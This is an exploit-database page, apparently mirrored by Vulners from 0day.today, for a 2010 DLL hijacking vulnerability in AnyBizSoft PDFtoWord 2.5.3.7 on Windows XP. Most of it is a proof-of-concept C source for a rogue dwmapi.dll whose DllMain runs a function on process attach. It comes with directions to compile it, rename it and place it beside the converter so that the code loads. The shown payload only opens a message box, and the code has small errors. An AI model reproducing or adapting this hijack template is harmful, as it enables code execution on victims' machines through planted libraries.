Lucene search
+L

AnyBizSoft PDFtoWord DLL Hijacking Vulnerability

🗓️ 01 Sep 2010 00:00:00Reported by t3rm!n4t0rType 
zdt
 zdt
🔗 0day.today👁 16 Views

AnyBizSoft PDFtoWord DLL Hijacking Vulnerability. Version 2.5.3.7 on Windows XP SP

Code
================================================
AnyBizSoft PDFtoWord DLL Hijacking Vulnerability
================================================


/*AnyBizSoft PDFtoWord DLL Hijacking Vulnerability
   
 ~Legion Of Xtremers and Hackers Garage~

  Author: Prashant Uniyal

  Special greets to:"vinnu" and Secfence Team

  Greets to: b0nd,fb1h2s,AnArKi,d4rk357,d4rky

  Version:  PDFtoWord 2.5.3.7

  Tested on: Windows XP SP2 En

  Complile and rename to dwmapi.dll. Place it in the dir 
  and execute convertor to check. 
*/


#include <windows.h>
 
BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
 
    switch (fdwReason)
    {
        case DLL_PROCESS_ATTACH:
        dll_hijack();
        case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
        case DLL_PROCESS_DETACH:
        break;
    }
 
    return TRUE;
}
 
int dll_hijack()
{
    MessageBox(0, "DLL Hijacked!",MB_OK);
}



#  0day.today [2018-01-10]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Sep 2010 00:00Current
6.8Medium risk
Vulners AI Score6.8
16